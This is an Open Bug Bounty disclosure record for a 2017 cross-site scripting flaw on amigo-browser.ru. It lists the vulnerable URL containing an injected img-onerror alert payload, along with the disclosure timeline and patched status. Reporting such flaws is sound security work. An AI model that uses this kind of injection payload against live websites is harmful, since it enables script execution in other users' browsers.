amigo-browser.ru XSS vulnerability

2017-05-23T13:59:00
ID OBB:240442
Type openbugbounty
Reporter keritzy
Modified 2017-05-31T21:37:00

Description

Vulnerable URL:
http://amigo-browser.ru/dkit-hps/?chid=12930/%27%22--!%3E%20%3Cimg%20src=x%20onerror=alert(%22OPENBUGBOUNTY%22)%3E&ext;_partnerid=dse.1:812270,dse.2:812274,hp.1:812269,hp.2:812273,pult.1:812271,pult.2:812275,any.2:812272,any:812268&token;=fDrYpMqTUQ𝔯=818068&subid;=hdclub
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 75658
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 23 May, 2017 13:59 GMT
Generic security notifications sent to website owner| 27 May, 2017 04:22 GMT
Vulnerability details disclosed by researcher| 31 May, 2017 07:15 GMT
Vulnerability patched by the website owner| 31 May, 2017 21:37 GMT